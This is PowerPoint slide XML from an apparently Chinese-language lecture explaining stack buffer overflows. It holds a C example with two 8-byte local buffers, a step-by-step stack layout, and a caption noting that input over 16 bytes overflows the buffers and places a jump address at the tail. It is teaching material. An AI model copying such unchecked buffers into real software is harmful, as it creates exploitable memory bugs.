            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>	fun(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>void  fun(int para) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>	char buffer_a[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>	char buffer_b[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="109728" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963"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D9B144A5-BE1C-494E-8B1A-5A9540ACEAF4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>227</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="293174" name="Group 310"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="813103928"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3861370" y="44624"/>
          <a:ext cx="5175125" cy="4637089"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2586763">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2588362">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>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动作</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　　　　堆栈</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第一步：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>main</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压入</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fun()</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参数１</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1"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第二步：</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调用</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a:t>
                      </a:r>
                      <a:endPar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系统压入返回到</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地址</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985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第三步：</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将</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基址指针值压入堆栈，同时将</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EBP</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指向</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ESP</a:t>
                      </a:r>
                      <a:endPar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90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第四步：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" normalizeH="0" baseline="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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>函数压入它的局部变量</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dirty="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93178" name="Group 314"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="894426131"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6444208" y="331961"/>
          <a:ext cx="2592263" cy="548640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2592263">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="261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itchFamily="18" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>　　　</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="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93177" name="Group 313"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="604724684"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6444233" y="881236"/>
          <a:ext cx="2592263" cy="822960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2592263">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="266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51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3176" name="Group 312"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1087951263"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6444233" y="1705149"/>
          <a:ext cx="2592263" cy="1097280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2592263">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老的基址指针值</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93175" name="Group 311"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="700642491"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6444233" y="2803699"/>
          <a:ext cx="2592263" cy="1889760"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2592263">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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Times New Roman" pitchFamily="18" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>老的基址指针值</a:t>
                      </a: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itchFamily="18" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>buffer_a</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itchFamily="18" charset="0"/>
                          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>buffer_b</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2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467544" y="4869160"/>
            <a:ext cx="3256014" cy="64807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a:t>局部变量 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字节</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370790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a:t>ebp4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字节</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514806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a:t>ret4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字节</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467545" y="5661248"/>
            <a:ext cx="6136334"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zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>&gt;16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>导致溢出，尾部为跳转的地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="流程图: 文档 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6516215" y="4941169"/>
            <a:ext cx="648074" cy="504056"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7236296" y="4852515"/>
            <a:ext cx="1685925" cy="520701"/>
            <a:chOff x="7236296" y="4852515"/>
            <a:chExt cx="1685925" cy="520701"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17"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FF">
                    <a:alpha val="67998"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="660066">
                    <a:alpha val="74001"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7306146" y="4852515"/>
              <a:ext cx="1357312" cy="369888"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="0066CC"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>正常流程</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="组合 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7206555" y="5644603"/>
            <a:ext cx="1685925" cy="520701"/>
            <a:chOff x="7236296" y="4852515"/>
            <a:chExt cx="1685925" cy="520701"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23"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noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7306146" y="4852515"/>
              <a:ext cx="1357312" cy="369888"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="0066CC"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>异常流程</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31540970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3174"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293174"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293174"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293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3178"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293178"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293178"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2931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3177"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293177"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293177"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2931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3176"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293176"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293176"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2931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3175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293175"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293175"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29317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5" grpId="0" animBg="1"/>
      <p:bldP spid="3" grpId="0" animBg="1"/>
    </p:bld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灯片编号占位符 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{087968B7-5F2A-4F55-B8A7-26C4B9B3F0A3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>228</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299013" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常见的情形</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="299010" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="tbl" idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="1910085"/>
            <a:ext cx="7431573" cy="2383011"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299012" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2852360" y="3933130"/>
